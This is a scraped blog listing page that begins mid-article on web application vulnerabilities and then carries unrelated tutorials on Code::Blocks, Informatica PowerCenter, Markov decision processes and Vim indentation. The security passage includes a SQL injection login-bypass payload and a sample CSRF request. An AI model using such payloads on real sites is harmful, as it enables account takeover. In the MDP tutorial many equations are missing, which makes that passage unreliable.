remove sensitive data. Such data could belong to other users, or be any data the application itself can access. In certain cases, an attacker can escalate the attack to exploit backend infrastructure like the underlying server. Common SQL injection examples include: Retrieving hidden data, thus modifying a SQL query to return enhanced results; Subverting application logic by essentially changing a query; UNION attacks, so as to retrieve data from different database tables; Examining the database, to retrieve information on the database’s version and structure; and Blind SQL injection, where you’re unable to retrieve application responses from queries you control. To illustrate subverting application logic, take an application that lets users log in with a username and password. If the user submits their username as donnie and their password as peddie, the application tests the credentials by performing this SQL query: SELECT * FROM users WHERE username = ‘donnie’ AND password = ‘donnie’ The login is successful where the query returns the user’s details. It is rejected, otherwise. An attacker can log in here as a regular user without a password, by merely using the SQL comment sequence -- to eliminate the password check from the WHERE clause of the query. An example is submitting the username admin’--along with a blank password in this query: SELECT * FROM users WHERE username = ‘admin’--’ AND password = ‘’ This query returns the user whose username is admin, successfully logging in the attacker in as that user. Memory corruption When a memory location is modified, leading to unexpected behavior in the software, memory corruption occurs. It is often not deliberate. Bad actors work hard to determine and exploit memory corruption using code injection or buffer overflow attacks. Hackers love memory vulnerabilities because it enables them to completely control a victim’s machine. Continuing the password example, let’s consider a simple password-validation C program. The code performs no validation on the length of the user input. It also does not ensure that sufficient memory is available to store the data coming from the user. Buffer overflow A buffer is a defined temporary storage in memory. When software writes data to a buffer, a buffer overflow might occur. Overflowing the buffer's capacity leads to overwriting adjacent memory locations with data. Attackers can exploit this to introduce malicious code in memory, with the possibility of developing a vulnerability within the target. In buffer overflow attacks, the extra data sometimes contains specific instructions for actions within the plan of a malicious user. An example is data that is able to trigger a response that changes data, reveals private information, or damages files. Heap-based buffer overflows are more difficult to execute than stack-based overflows. They are also less common, attacking an application by flooding the memory space dedicated for a program. Stack-based buffer overflows exploit applications by using a stack - a memory space for storing input. Cross-site request forgery (CSRF) Cross-site request forgery tricks a victim into supplying their authentication or authorization details in requests. The attacker now has the user's account details and proceeds to send a request by pretending as the user. Armed with a legitimate user account, the attacker can modify, exfiltrate, or destroy critical information. Vital accounts belonging to executives or administrators are typical targets. The attacker commonly requests the victim user to perform an action unintentionally. Changing an email address on their account, changing their password, or making a funds transfer are examples of such actions. The nature of the action could give the attacker full control over the user’s control. The attacker may even gain full control of the application’s data and security if the target user has high privileges within the application. Three vital conditions for a CSRF attack include: A relevant action within the application that the attacker has reason to induce. Modifying permissions for other users (privileged action) or acting on user-specific data (changing the user’s password, for example). Cookie-based session handling to identify who has made user requests. There is no other mechanism to track sessions or validate user requests. No unpredictable request parameters. When causing a user to change their password, for example, the function is not vulnerable if an attacker needs to know the value of the existing password. Let’s say an application contains a function that allows users to change the email address on their account. When a user performs this action, they make a request such as the following: POST /email/change HTTP/1.1 Host: target-site.com Content-Type: application/x-www-form-urlencoded Content-Length: 30 Cookie: session=yvthwsztyeQkAPzeQ5gHgTvlyxHfsAfE [email protected] The attacker may then build a web page containing the following HTML: Where the victim visits the attacker’s web page, these will happen: The attacker’s page will trigger an HTTP request to the vulnerable website. If the user is logged in to the vulnerable site, their browser will automatically include their session cookie in the request. The vulnerable website will carry on as normal, processing the malicious request, and change the victim user’s email address. Mitigating Vulnerabilities with Kali Linux Securing web-based user accounts from exploitation includes essential steps, such as using up-to-date encryption. Tools are available in Kali that can help generate application crashes or scan for various other vulnerabilities. Fuzzers, as these tools are called, are a relatively easy way to generate malformed data to observe how applications handle them. Other measures include demanding proper authentication, continuously patching vulnerabilities, and exercising good software development hygiene. As part of their first line of defence, many companies take a proactive approach, engaging hackers to participate in bug bounty programs. A bug bounty rewards developers for finding critical flaws in software. Open source software like Kali Linux allow anyone to scour an application’s code for flaws. Monetary rewards are a typical incentive. White hat hackers can also come onboard with the sole assignment of finding internal vulnerabilities that may have been treated lightly. Smart attackers can find loopholes even in stable security environments, making a fool-proof security strategy a necessity. The security of web-based applications can be through protecting against Application Layer, DDoS, and DNS attacks. Kali Linux is a comprehensive tool for securing web-based applications Organizations curious about the state of security of their web-based application need not fear; especially when they are not prepared for a full-scale penetration test. Attackers are always on the prowl, scanning thousands of web-based applications for the low-hanging fruit. By ensuring a web-based application is resilient in the face of these overarching attacks, applications reduce any chances of experiencing an attack. The hackers will only migrate to more peaceful grounds. So, how do organizations or individuals stay secure from attackers? Regular pointers include using HTTPS, adding a Web Application, installing security plugins, hashing passwords, and ensuring all software is current. These significant recommendations lower the probability of finding vulnerabilities in application code. Security continues to evolve, so it's best to integrate it into the application development lifecycle. Security vulnerabilities within your app are almost impossible to avoid. To identify vulnerabilities, one must think like an attacker, and test the web-based application thoroughly. A Debian Linux derivative from Offensive Security Limited, Kali Linux, is primarily for digital forensics and penetration testing. It is a successor to the revered BackTrack Linux project. The BackTrack project was based on Knoppix and manually maintained. Offensive Security wanted a true Debian derivative, with all the necessary infrastructure and improved packaging techniques. The quality, stability, and wide software selection were key considerations in choosing Debian. While developers churn out web-based applications by the minute, the number of web-based application attacks grows alongside in an exponential order. Attackers are interested in exploiting flaws in the applications, just as organizations want the best way to detect attackers’ footprints in the web application firewall. Thus, it will be detecting and blocking the specific patterns on the web-based application. Key features of Kali Linux Kali Linux has 32-bit and 64-bit distributions for hosts relying on the x86 instruction set. There's also an image for the ARM architecture. The ARM architecture image is for the Beagle Board computer and the ARM Chromebook from Samsung. Kali Linux is available for other devices like the Asus Chromebook Flip C100P, HP Chromebook, CuBox, CubieBoard 2, Raspberry Pi, Odroid U2, EfikaMX, Odroid XU, Odroid XU3, Utilite Pro, SS808, Galaxy Note 10.1, and BeagleBone Black. There are plans to make distributions for more ARM devices. Android devices like Google's Nexus line, OnePlus One, and Galaxy models also have Kali Linux through Kali NetHunter. Kali NetHunter is Offensive Security’s project to ensure compatibility and porting to specific Android devices. Via the Windows Subsystem for Linux (WSL), Windows 10 users can use any of the more than 600 ethical hacking tools within Kali Linux to expose vulnerabilities in web applications. The official Windows distribution IS from the Microsoft Store, and there are tools for various other systems and platforms. Conclusion Despite a plethora of tools dedicated to web app security and a robust curation mechanism, Kali Linux is the distribution of choice to expose vulnerabilities in web-based applications. Other tool options include Kubuntu, Black Parrot OS, Cyborg Linux, BackBox Linux, and Wifislax. While being open source has helped its meteoric rise, Kali Linux is one of the better platforms for up-to-date security utilities. It remains the most advanced penetration testing platform out there, supporting a wide variety of devices and hardware platforms. Kali Linux also has decent documentation compared to numerous other open source projects. There is a large, active, and vibrant community and you can easily install Kali Linux in VirtualBox on Windows to begin your hacking exploits right away. To further discover various stealth techniques to remain undetected and defeat modern infrastructures and also to explore red teaming techniques to exploit secured environment, do check out the book Mastering Kali Linux for Advanced Penetration Testing - Third Edition written by Vijay Kumar Velu and Robert Beggs. Author Bio Chris is a growth marketing and cybersecurity expert writer. He has contributed to sites such as “Cyber Defense Magazine,” “Social Media News,” and “MTA.” He’s also contributed to several cybersecurity magazines. He enjoys freelancing and helping others learn more about protecting themselves online. He’s always curious and interested in learning about the latest developments in the field. He’s currently the Editor in Chief for EveryCloud’s media division. Glen Singh on why Kali Linux is an arsenal for any cybersecurity professional [Interview] 3 cybersecurity lessons for e-commerce website administrators Implementing Web application vulnerability scanners with Kali Linux [Tutorial]
Read more
  • 0
  • 0
  • 7167

article-image-getting-started-codeblocks
Packt
28 Oct 2013
7 min read
Save for later

Getting Started with Code::Blocks

Packt
28 Oct 2013
7 min read
(For more resources related to this topic, see here.) Why Code::Blocks? Before we go on learning more about Code::Blocks let us understand why we shall use Code::Blocks over other IDEs. It is a cross-platform Integrated Development Environment (IDE). It supports Windows, Linux, and Mac operating system. It supports GCC compiler and GNU debugger on all supported platforms completely. It supports numerous other compilers to various degrees on multiple platforms. It is scriptable and extendable. It comes with several plugins that extend its core functionality. It is lightweight on resources and doesn't require a powerful computer to run it. Finally, it is free and open source. Installing Code::Blocks on Windows Our primary focus of this article will be on Windows platform. However, we'll touch upon other platforms wherever possible. Official Code::Blocks binaries are available from www.codeblocks.org. Perform the following steps for successful installation of Code::Blocks: For installation on Windows platform download codeblocks-12.11mingw-setup.exe file from http://www.codeblocks.org/downloads/26 or from sourceforge mirror http://sourceforge.net/projects/codeblocks/files/Binaries/12.11/Windows/codeblocks-12.11mingw-setup.exe/download and save it in a folder. Double-click on this file and run it. You'll be presented with the following screen: As shown in the following screenshot click on the Next button to continue. License text will be presented. The Code::Blocks application is licensed under GNU GPLv3 and Code::Blocks SDK is licensed under GNU LGPLv3. You can learn more about these licenses at this URL—https://www.gnu.org/licenses/licenses.html. Click on I Agree to accept the License Agreement. The component selection page will be presented in the following screenshot: You may choose any of the following options: Default install: This is the default installation option. This will install Code::Block's core components and core plugins. Contrib Plugins: Plugins are small programs that extend Code::Block's functionality. Select this option to install plugins contributed by several other developers. C::B Share Config: This utility can copy all/parts of configuration file. MinGW Compiler Suite: This option will install GCC 4.7.1 for Windows. Select Full Installation and click on Next button to continue. As shown in the following screenshot installer will now prompt to select installation directory: You can install it to default installation directory. Otherwise choose Destination Folder and then click on the Install button. Installer will now proceed with installation. As shown in the following screenshot Code::Blocks will now prompt us to run it after the installation is completed: Click on the No button here and then click on the Next button. Installation will now be completed: Click on the Finish button to complete installation. A shortcut will be created on the desktop. This completes our Code::Blocks installation on Windows. Installing Code::Blocks on Linux Code::Blocks runs numerous Linux distributions. In this section we'll learn about installation of Code::Blocks on CentOS linux. CentOS is a Linux distro based on Red Hat Enterprise Linux and is a freely available, enterprise grade Linux distribution. Perform the following steps to install Code::Blocks on Linux OS: Navigate to Settings | Administration | Add/Remove Software menu option. Enter wxGTK in the Search box and hit the Enter key. As of writing wxGTK-2.8.12 is the latest wxWidgets stable release available. Select it and click on the Apply button to install wxGTK package via the package manager, as shown in the following screenshot. Download packages for CentOS 6 from this URL—http://www.codeblocks.org/downloads/26. Unpack the .tar.bz2 file by issuing the following command in shell: tar xvjf codeblocks-12.11-1.el6.i686.tar.bz2 Right-click on the codeblocks-12.11-1.el6.i686.rpm file as shown in the following screenshot and choose the Open with Package Installer option. The following window will be displayed. Click on the Install button to begin installation, as shown in the following screenshot: You may be asked to enter the root password if you are installing it from a user account. Enter the root password and click on the Authenticate button. Code::Blocks will now be installed. Repeat steps 4 to 6 to install other rpm files. We have now learned to install Code::Blocks on the Windows and Linux platforms. We are now ready for C++ development. Before doing that we'll learn about the Code::Blocks user interface. First run On the Windows platform navigate to the Start | All Programs | CodeBlocks | CodeBlocks menu options to launch Code::Blocks. Alternatively you may double-click on the shortcut displayed on the desktop to launch Code::Blocks, as in the following screenshot: On Linux navigate to Applications | Programming | Code::Blocks IDE menu options to run Code::Blocks. Code::Blocks will now ask the user to select the default compiler. Code::Blocks supports several compilers and hence, is able to detect the presence of other compilers. The following screenshot shows that Code::Blocks has detected GNU GCC Compiler (which was bundled with the installer and has been installed). Click on it to select and then click on Set as default button, as shown in the following screenshot: Do not worry about the items highlighted in red in the previous screenshot. Red colored lines indicate Code::Blocks was unable to detect the presence of a particular compiler. Finally, click on the OK button to continue with the loading of Code::Blocks. After the loading is complete the Code::Blocks window will be shown. The following screenshot shows main window of Code::Blocks. Annotated portions highlight different User Interface (UI) components: Now, let us understand more about different UI components: Menu bar and toolbar: All Code::Blocks commands are available via menu bar. On the other hand toolbars provide quick access to commonly used commands. Start page and code editors: Start page is the default page when Code::Blocks is launched. This contains some useful links and recent project and file history. Code editors are text containers to edit C++ (and other language) source files. These editors offer syntax highlighting—a feature that highlights keywords in different colors. Management pane: This window shows all open files (including source files, project files, and workspace files). This pane is also used by other plugins to provide additional functionalities. In the preceding screenshot FileManager plugin is providing a Windows Explorer like facility and Code Completion plugin is providing details of currently open source files. Log windows: Log messages from different tools, for example, compiler, debugger, document parser, and so on, are shown here. This component is also used by other plugins. Status bar: This component shows various status information of Code::Blocks, for example, file path, file encoding, line numbers, and so on. Introduction to important toolbars Toolbars provide easier access to different functions of Code::Blocks. Amongst the several toolbars following ones are most important. Main toolbar The main toolbar holds core component commands. From left to right there are new file, open file, save, save all, undo, redo, cut, copy, paste, find, and replace buttons. Compiler toolbar The compiler toolbar holds commonly used compiler related commands. From left to right there are build, run, build and run, rebuild, stop build, build target buttons. Compilation of C++ source code is also called a build and this terminology will be used throughout the article. Debugger toolbar The debugger toolbar holds commonly used debugger related commands. From left to right there are debug/continue, run to cursor, next line, step into, step out, next instruction, step into instruction, break debugger, stop debugger, debugging windows, and various info buttons. Summary In this article we have learned to download and install Code::Blocks. We also learnt about different interface elements. Resources for Article: Further resources on this subject: OpenGL 4.0: Building a C++ Shader Program Class [Article] Application Development in Visual C++ - The Tetris Application [Article] Building UI with XAML for Windows 8 Using C [Article]
Read more
  • 0
  • 0
  • 7167

article-image-working-targets-informatica-powercenter-10-x
Savia Lobo
11 Dec 2017
8 min read
Save for later

Working with Targets in Informatica PowerCenter 10.x

Savia Lobo
11 Dec 2017
8 min read
[box type="note" align="" class="" width=""]This article is an excerpt from a book by Rahul Malewar titled Learning Informatica PowerCenter 10.x. The book harnesses the power and simplicity of Informatica PowerCenter 10.x to build and manage efficient data management solutions.[/box] This article guides you through working with the target designer in the Informatica’s PowerCenter. It provides a user interface for creation and customization of the logical target schema. PowerCenter is capable of working with different types of targets to load data: Database: PowerCenter supports all the relations databases such as Oracle, Sybase, DB2, Microsoft SQL Server, SAP HANA, and Teradata. File: This includes flat files (fixed width and delimited files), COBOL Copybook files, XML files, and Excel files. High-end applications: PowerCenter also supports applications such as Hyperion, PeopleSoft, TIBCO, WebSphere MQ, and so on. Mainframe: Additional features of Mainframe such as IBM DB2 OS/390, IBM DB2 OS/400, IDMS, IDMS-X, IMS, and VSAM can be purchased Other: PowerCenter also supports Microsoft Access and external web services. Let's start! Working with Target relational database tables - the Import option Just as we discussed importing and creating source files and source tables, we need to work on target definitions. The process of importing the target table is exactly same as importing the Source table, the only difference is that you need to work in the Target Designer. You can import or create the table structure in the Target Designer. After you add these target definitions to the repository, you can use them in a mapping. Follow these steps to import the table target definition: In the Designer, go to Tools | Target Designer to open the Target Designer. Go to Targets | Importfrom Database. From the ODBC data source button, select the ODBC data source that you created to access source tables. We have already added the data source while working on the sources. Enter the username and password to connect to the database. Click on Connect. In the Select tables list, expand the database owner and the TABLE heading. Select the tables you wish to import, and click on OK. The structure of the selected tables will appear in the Target Designer in workspace. As mentioned, the process is the same as importing the source in the Source Analyzer. Follow the preceding steps in case of some issues. Working with Target Flat Files - the Import option The process of importing the target file is exactly same as importing the Source file, the only difference is that you need to work on the Target Designer. Working with delimited files Following are the steps that you will have to perform to work with delimited files. In the Designer, go to Tools | Target Designer to open the Target Designer. Go to Target | Importfrom File. Browse the files you wish to import as source files. The flat file import wizard will come up. Select the file type -- Delimited. Also, select the appropriate option to import the data from second row and import filed names from the first line as we did in case of importing the source. Click on Next. Select the type of delimiter used in the file. Also, check the quotes option -- No Quotes, Single Quotes, and Double Quotes -- to work with the quotes in the text values. Click on Next. Verify the column names, data type, and precision in the data view option. Click on Next. Click on Finish to get the target file imported in the Target Designer. We now move on to fixed width files. Working with fixed width Files Following are the steps that you will have to perform to work with fixed width Files: In the Designer, go to Tools | Target Designer to open the Target Designer. Go to Target | Import from File. Browse the files you wish to use as source files. The Flat file import wizard will come up. Select the file type -- fixed width. Click on Next. Set the width of each column as required by adding a line break. Click on Next. Specify the column names, data type, and precision in the data view option. Click on Next. Click on Finish to get the target imported in the Target Designer. Just as in the case of working with sources, we move on to the create option in target. Working with Target - the Create option Apart from importing the file or table structure, we can manually create the Target Definition. When the sample Target file or the table structure is not available, we need to manually create the Target structure. When we select the create option, we need to define every detail related to the file or table manually, such as the name of the Target, the type of the Target, column names, column data type, column data size, indexes, constraints, and so on. When you import the structure, the import wizard automatically imports all these details. In the Designer, go to Tools | Target Designer to open the Target Designer. Go to Target | Create. Select the type of Target you wish to create from the drop-down list. An empty target structure will appear in the Target Designer. Double-click on the title bar of the target definition for the T_EMPLOYEES table. This will open the T_EMPLOYEES target definition. A popup window will display all the properties of this target definition. The Table tab will show the name of the table, the name of the owner, and the database type. You can add a comment in the Description section. Usually, we keep the Business name empty. Click on the Columns tab. This will display the column descriptions for the target. You can add, delete, or edit the columns. Click on the Metadata Extensions tab (usually, you keep this tab blank). You can store some Metadata related to the target you created. Some personal details and reference details can be saved. Click on Apply and then on OK. Go to Repository | Save to save the changes to the repository. Let's move on to something interesting now! Working with Target - the Copy or Drag-Drop option PowerCenter provides a very convenient way of reusing the existing components in the Repository. It provides the Drag-Drop feature, which helps in reusing the existing components. Using the Drag-Drop feature, you can copy the existing source definition created earlier to the Target Designer in order to create the target definition with the same structure. Follow these steps: Step 1: In the Designer, go to Tools | Target Designer to open the Target Designer. Step 2: Drag the SRC_STUDENT source definition from the Navigator to the Target Designer workspace as shown in the following screenshot: Step 3: The Designer creates a target definition, SRC_STUDENT, with the same column definitions as the SRC_STUDENT source definition and the same database type: Step 4: Double-click on the title bar of the SRC_STUDENT target definition to open it and edit properties if you wish to change some properties. Step 5: Click on Rename: Step 6: A new pop-up window will allow you to mention the new name. Change the target definition name to TGT_STUDENT: Step 7: Click on OK Step 8: Click on the Columns tab. The target column definitions are the same as the SRC_STUDENT source definition. You can add new columns, delete existing columns, or edit the columns as per your requirement. Step 9: Click on OK to save the changes and close the dialog box. Step 10: Go to Repository | Save Creating Source Definition from Target structure With Informatica PowerCenter 10.1.0, now you can drag and drop the target definition from target designer into Source Analyzer. In the previous topic, we learned to drag-drop the Source definition from Source Analyzer and reuse it in Target Designer. In the previous versions of Informatica, this feature was not available. In the latest version, this feature is now available. Follow the steps as shown in the preceding section to drag-drop the target definition into Source Analyzer. In the article, we have tried to explain how to work with the target designer, one of the basic component of the PowerCenter designer screen in Informatica 10.x. Additionally to use the target definition from the target designer to create a source definition. If you liked the above article, checkout our book, Learning Informatica PowerCenter 10.x. The book will let you explore more on how to implement various data warehouse and ETL concepts, and use PowerCenter 10.x components to build mappings, tasks, workflows, and so on.  
Read more
  • 0
  • 0
  • 7162

article-image-reinforcement-learning-mdp-markov-decision-process-tutorial
Fatema Patrawala
09 Jul 2018
11 min read
Save for later

Implement Reinforcement learning using Markov Decision Process [Tutorial]

Fatema Patrawala
09 Jul 2018
11 min read
The Markov decision process, better known as MDP, is an approach in reinforcement learning to take decisions in a gridworld environment. A gridworld environment consists of states in the form of grids. The MDP tries to capture a world in the form of a grid by dividing it into states, actions, models/transition models, and rewards. The solution to an MDP is called a policy and the objective is to find the optimal policy for that MDP task. Thus, any reinforcement learning task composed of a set of states, actions, and rewards that follows the Markov property would be considered an MDP. In this tutorial, we will dig deep into MDPs, states, actions, rewards, policies, and how to solve them using Bellman equations. This article is a reinforcement learning tutorial taken from the book, Reinforcement learning with TensorFlow. Markov decision processes MDP is defined as the collection of the following: States: S Actions: A(s), A Transition model: T(s,a,s') ~ P(s'|s,a) Rewards: R(s), R(s,a), R(s,a,s') Policy:  is the optimal policy In the case of an MDP, the environment is fully observable, that is, whatever observation the agent makes at any point in time is enough to make an optimal decision. In case of a partially observable environment, the agent needs a memory to store the past observations to make the best possible decisions. Let's try to break this into different lego blocks to understand what this overall process means. The Markov property In short, as per the Markov property, in order to know the information of near future (say, at time t+1) the present information at time t matters. Given a sequence, , the first order of Markov says, , that is,  depends only on . Therefore,  will depend only on . The second order of Markov says, , that is,  depends only on  and  In our context, we will follow the first order of the Markov property from now on. Therefore, we can convert any process to a Markov property if the probability of the new state, say , depends only on the current state, , such that the current state captures and remembers the property and knowledge from the past. Thus, as per the Markov property, the world (that is, the environment) is considered to be stationary, that is, the rules in the world are fixed. The S state set The S state set is a set of different states, represented as s, which constitute the environment. States are the feature representation of the data obtained from the environment. Thus, any input from the agent's sensors can play an important role in state formation. State spaces can be either discrete or continuous. The starts from start state and has to reach the goal state in the most optimized path without ending up in bad states (like the red colored state shown in the diagram below). Consider the following gridworld as having 12 discrete states, where the green-colored grid is the goal state, red is the state to avoid, and black is a wall that you'll bounce back from if you hit it head on: The states can be represented as 1, 2,....., 12 or by coordinates, (1,1),(1,2),.....(3,4). Actions The actions are the things an agent can perform or execute in a particular state. In other words, actions are sets of things an agent is allowed to do in the given environment. Like states, actions can also be either discrete or continuous. Consider the following gridworld example having 12 discrete states and 4 discrete actions (UP, DOWN, RIGHT, and LEFT): The preceding example shows the action space to be a discrete set space, that is, a  A where, A = {UP, DOWN, RIGHT, and LEFT}. It can also be treated as a function of state, that is, a = A(s), where depending on the state function, it decides which action is possible. Transition model The transition model T(s, a, s') is a function of three variables, which are the current state (s), action (a), and the new state (s'), and defines the rules to play the game in the environment. It gives probability P(s'|s, a), that is, the probability of landing up in the new s' state given that the agent takes an action, a, in given state, s. The transition model plays the crucial role in a stochastic world, unlike the case of a deterministic world where the probability for any landing state other than the determined one will have zero probability. Let's consider the following environment (world) and consider different cases, determined and stochastic: Since the actions a  A where, A = {UP, DOWN, RIGHT, and LEFT}. The behavior of these two cases depends on certain factors: Determined environment: In a determined environment, if you take a certain action, say UP, you will certainly perform that action with probability 1. Stochastic environment: In a stochastic environment, if you take the same action, say UP, there will certain probability say 0.8 to actually perform the given action and there is 0.1 probability it can perform an action (either LEFT or RIGHT) perpendicular to the given action, UP. Here, for the s state and the UP action transition model, T(s',UP, s) = P(s'| s,UP) = 0.8. Since T(s,a,s') ~ P(s'|s,a), where the probability of new state depends on the current state and action only, and none of the past states. Thus, the transition model follows the first order Markov property. We can also say that our universe is also a stochastic environment, since the universe is composed of atoms that are in different states defined by position and velocity. Actions performed by each atom change their states and cause changes in the universe. Rewards The reward of the state quantifies the usefulness of entering into a state. There are three different forms to represent the reward namely, R(s), R(s, a) and R(s, a, s'), but they are all equivalent. For a particular environment, the domain knowledge plays an important role in the assignment of rewards for different states as minor changes in the reward do matter for finding the optimal solution to an MDP problem. There are two approaches we reward our agent for when taking a certain action. They are: Credit assignment problem: We look at the past and check which actions led to the present reward, that is, which action gets the credit Delayed rewards: In contrast, in the present state, we check which action to take that will lead us to potential rewards Delayed rewards form the idea of foresight planning. Therefore, this concept is being used to calculate the expected reward for different states. We will discuss this in the later sections. Policy Until now, we have covered the blocks that create an MDP problem, that is, states, actions, transition models, and rewards, now comes the solution. The policy is the solution to an MDP problem. The policy is a function that takes the state as an input and outputs the action to be taken. Therefore, the policy is a command that the agent has to obey.  is called the optimal policy, which maximizes the expected reward. Among all the policies taken, the optimal policy is the one that optimizes to maximize the amount of reward received or expected to receive over a lifetime. For an MDP, there's no end of the lifetime and you have to decide the end time. Thus, the policy is nothing but a guide telling which action to take for a given state. It is not a plan but uncovers the underlying plan of the environment by returning the actions to take for each state. The Bellman equations Since the optimal  policy is the policy that maximizes the expected rewards, therefore, , where  means the expected value of the rewards obtained from the sequence of states agent observes if it follows the  policy. Thus,  outputs the  policy that has the highest expected reward. Similarly, we can also calculate the utility of the policy of a state, that is, if we are at the s state, given a  policy, then, the utility of the  policy for the s state, that is,  would be the expected rewards from that state onward: The immediate reward of the state, that is,  is different than the utility of the  state (that is, the utility of the optimal policy of the  state) because of the concept of delayed rewards. From now onward, the utility of the  state will refer to the utility of the optimal policy of the state, that is, the  state. Moreover, the optimal policy can also be regarded as the policy that maximizes the expected utility. Therefore, where, T(s,a,s') is the transition probability, that is, P(s'|s,a) and U(s') is the utility of the new landing state after the a action is taken on the s state.  refers to the summation of all possible new state outcomes for a particular action taken, then whichever action gives the maximum value of  that is considered to be the part of the optimal policy and thereby, the utility of the 's' state is given by the following Bellman equation, where,  is the immediate reward and  is the reward from future, that is, the discounted utilities of the 's' state where the agent can reach from the given s state if the action, a, is taken. Solving the Bellman equation to find policies Say we have some n states in the given environment and if we see the Bellman equation, we find out that n states are given; therefore, we will have n equations and n unknown but the  function makes it non-linear. Thus, we cannot solve them as linear equations. Therefore, in order to solve: Start with an arbitrary utility Update the utilities based on the neighborhood until convergence, that is, update the utility of the state using the Bellman equation based on the utilities of the landing states from the given state Iterate this multiple times to lead to the true value of the states. This process of iterating to convergence towards the true value of the state is called value iteration. For the terminal states where the game ends, the utility of those terminal state equals the immediate reward the agent receives while entering the terminal state. Let's try to understand this by implementing an example. An example of value iteration using the Bellman equation Consider the following environment and the given information: Given information: A, C, and X are the names of some states. The green-colored state is the goal state, G, with a reward of +1. The red-colored state is the bad state, B, with a reward of -1, try to prevent your agent from entering this state Thus, the green and red states are the terminal states, enter either and the game is over. If the agent encounters the green state, that is, the goal state, the agent wins, while if they enter the red state, then the agent loses the game. ,  (that is, reward for all states except the G and B states is -0.04),  (that is, the utility at the first time step is 0, except the G and B states). Transition probability T(s,a,s') equals 0.8 if going in the desired direction; otherwise, 0.1 each if going perpendicular to the desired direction. For example, if the action is UP then with 0.8 probability, the agent goes UP but with 0.1 probability it goes RIGHT and 0.1 to the LEFT. Questions:  Find , the utility of the X state at time step 1, that is, the agent will go through one iteration Similarly, find  Solution: R(X) = -0.04 Action as'RIGHT G 0.8+10.8 x 1 = 0.8RIGHTC0.100.1 x 0 = 0RIGHTX0.100.1 x 0 = 0 Thus, for action a = RIGHT, Action as'DOWN C 0.800.8 x 0 = 0DOWNG0.1+10.1 x 1 = 0.1DOWNA0.100.1 x 0 = 0 Thus, for action a = DOWN, Action as'UP X 0.800.8 x 0 = 0UPG0.1+10.1 x 1 = 0.1UPA0.100.1 x 0 = 0 Thus, for action a = UP, Action as'LEFT A 0.800.8 x 0 = 0LEFTX0.100.1 x 0 = 0LEFTC0.100.1 x 0 = 0 Thus, for action a = LEFT, Therefore, among all actions, Therefore, , where  and  Similarly, calculate  and  and we get  and  Since, , and, R(X) = -0.04 Action as'RIGHT G 0.8+10.8 x 1 = 0.8RIGHTC0.1-0.040.1 x -0.04 = -0.004RIGHTX0.10.360.1 x 0.36 = 0.036 Thus, for action a = RIGHT, Action as'DOWN C 0.8-0.040.8 x -0.04 = -0.032DOWNG0.1+10.1 x 1 = 0.1DOWNA0.1-0.040.1 x -0.04 = -0.004 Thus, for action a = DOWN, Action as'UP X 0.80.360.8 x 0.36 = 0.288UPG0.1+10.1 x 1 = 0.1UPA0.1-0.040.1 x -0.04 = -0.004 Thus, for action a = UP, Action as'LEFT A 0.8-0.040.8 x -0.04 = -0.032LEFTX0.10.360.1 x 0.36 = 0.036LEFTC0.1-0.040.1 x -0.04 = -0.004 Thus, for action a = LEFT, Therefore, among all actions, Therefore, , where  and  Therefore, the answers to the preceding questions are:     Policy iteration The process of obtaining optimal utility by iterating over the policy and updating the policy itself instead of value until the policy converges to the optimum is called policy iteration. The process of policy iteration is as follows: Start with a random policy,  For the given  policy at iteration step t, calculate  by using the following formula: Improve the  policy by This ends an interesting reinforcement learning tutorial. Want to implement state-of-the-art Reinforcement Learning algorithms from scratch? Get this best-selling title, Reinforcement Learning with TensorFlow. How Reinforcement Learning works Convolutional Neural Networks with Reinforcement Learning Getting started with Q-learning using TensorFlow
Read more
  • 0
  • 0
  • 7160

article-image-vim-72-formatting-code
Packt
30 Apr 2010
11 min read
Save for later

Vim 7.2 Formatting Code

Packt
30 Apr 2010
11 min read
Formatting code often depends on many different things. Each programming language has its own syntax, and some languages rely on formatting like indentation more than others. In some cases, the programmer is following style guidelines given by an employer so that code can follow the company-wide style. So, how should Vim know how you want your code to be formatted? The short answer is that it shouldn't! But by being flexible, Vim can let you set up exactly how you want your formatting done. However, the fact is that even though formatting differs, most styles of formatting follow the same basic rules. This means that in reality, you only have to change the things that differ. In most cases, the changes can be handled by changing a range of settings in Vim. Among these, there are a few especially worth mentioning: Formatoptions: This setting holds formatting-specific settings (see :help 'fo') Comments: What are comments and how they should be formatted (see :help 'co') (no)expandtab: Convert tabs to spaces (see :help 'expandtab') Softtabstop: How many spaces a single tab is converted to (see :help 'sts') Tabstop: How many spaces a tab looks like (see :help 'ts') With these options, you can set nearly every aspect of how Vim will indent your code, and whether it should use spaces or tabs for indentation. But this is not enough because you still have to tell Vim if it should actually try to do the indentation for you, or if you want to do it manually. It you want Vim to do the indentation for you, you have the choice between four different ways for Vim to do it. In the following sections, we will look at the options you can set to interact with the way Vim indents code. Autoindent Autoindent is the simplest way of getting Vim to indent your code. It simply stays at the same indentation level as the previous line. So, if the current line is indented with four spaces, then the new line you add by pressing Enter will automatically be indented with four spaces too. It is then up to you as to how and when the indentation level needs to change again. This type of indentation is particularly good for languages where the indentation stays the same for several lines in a row. You get autoindent by using :set, autoindent, or :set ai. Smartindent Smartindent is the next step when you want a smarter indent than autoindent. It still gives you the indentation from the previous line, but you don't have to change the indentation level yourself. Smartindent recognizes the most common structures from the C programming language and uses this as a marker for when to add / remove the indentation levels. As many languages are loosely based on the same syntax as C, this will work for those languages as well. You get smart indent by using any of the following commands: :set smartindent :set si Cindent Cindent is often called clever indent or configurable indent because it is more configurable than the previous two indentation methods. You have access to three different setup options: cinkeys This option contains a comma-separated list of keys that Vim should use to change the indentation level. An example could be: :set cinkeys="0{,0},0#,:", which means that it should reindent whenever it hits a {, a } or a # as the first character on the line, or if you use : as the last character on the line (as used in switch constructs in many languages).The default value for cinkeys is "0{, 0}, 0), :, 0#, !^F, o, O, and e". See :help cinkeys for more information on what else you can set in this option. cinoptions This option contains all the special options you can set specifically for cindent. A large range of options can be set in this comma-separated list. An example could be:set cinoptions=">2,{3,}3", which means that we want Vim to add two extra spaces to the normal indent length, and we want to place { and } three spaces as compared to the previous line. So, if we have a normal indent to be four spaces, then the previous example could result in the code looking like this (dot marks represent a space): if( a == b) ...{ ......print "hello"; ...} The default value for cinoptions is this quite long string: ">s,e0,n0,f0,{0,}0,^0,:s,=s,l0,b0,gs,hs,ps,ts,is,+s,c3,C0,/0,(2s,us,U0,w0,W0,m0,j0,)20,*30" . See :help 'cinoptions' for more information on all the options. cinwords This option contains all the special keywords that will make Vim add indentation on the next line. An example could be: :set cinwords="if,else,do,while,for,switch", which is also the default value for this option. See :help 'cinwords' for more information. Indentexpr Indentexpr is the most flexible indent option to use, but also the most complex. When used, 